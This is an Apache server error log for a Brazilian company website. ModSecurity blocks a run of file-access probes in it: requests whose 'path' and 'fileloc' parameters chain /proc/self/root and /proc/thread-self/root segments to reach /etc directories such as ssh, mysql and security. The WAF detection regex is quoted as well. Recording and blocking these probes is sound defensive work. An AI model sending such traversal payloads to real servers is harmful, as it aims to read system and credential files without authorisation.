[Wed Mar 18 12:09:04.855759 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:41360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAEMdf6f5d65gmYZTi1wAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:09.627464 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:41364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAFfu8EFLIOrSqIpsR9gAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:11.026460 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:47544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAF-yqAr6etmhZHNrSAQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:13.452262 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:47548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAGew_le52K8_3pV3tKwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:14.789428 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:47560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAGkzinOy1jxa1j4ckRwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:17.452296 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:47568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAHcdf6f5d65gmYZTi3gAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:19.879236 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:47578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAHkzinOy1jxa1j4ckTgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:09:21.774205 2026] [mime_magic:error] [pid 15826:tid 140411691570944] (70014)End of file found: [client 57.141.18.51:52656] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:09:34.744019 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:44214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrALkzinOy1jxa1j4ckXgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:09:36.121175 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:60940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAMMdf6f5d65gmYZTi8AAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:09:39.180789 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:60950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAMuyqAr6etmhZHNrSLAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:10:13.906427 2026] [mime_magic:error] [pid 19507:tid 140411557287680] (70014)End of file found: [client 57.141.18.32:55214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:10:43.857775 2026] [mime_magic:error] [pid 19507:tid 140411540502272] (70014)End of file found: [client 74.7.243.128:45586] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/sys/kernel
[Wed Mar 18 12:10:46.661805 2026] [mime_magic:error] [pid 17653:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:40540] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:11:05.730646 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:40946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAieoXxyEfFpUF8f974wAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:11:13.130620 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:33326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAkcdf6f5d65gmYZTjcwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:11:26.625786 2026] [mime_magic:error] [pid 31803:tid 140411741927168] (70014)End of file found: [client 57.141.18.76:59328] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:11:36.057788 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:61823] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:11:45.513078 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:33330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAseyqAr6etmhZHNrSzQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:11:55.550506 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:47804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAu-w_le52K8_3pV3t8QAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:12:02.307317 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:42422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAwuw_le52K8_3pV3t_QAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 12:12:10.403382 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.241.31:36168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrAykzinOy1jxa1j4ck4QAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:13:24.729954 2026] [mime_magic:error] [pid 17653:tid 140411649607424] (70014)End of file found: [client 57.141.18.84:36078] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:13:41.836454 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:43872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBJfu8EFLIOrSqIpsTBQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:13:42.938948 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:36170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBJimAPhZkrhU8w4l8zAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:13:43.139824 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:55866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBJ-oXxyEfFpUF8f98XAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:13:48.494591 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:55868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBK-w_le52K8_3pV3uVgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
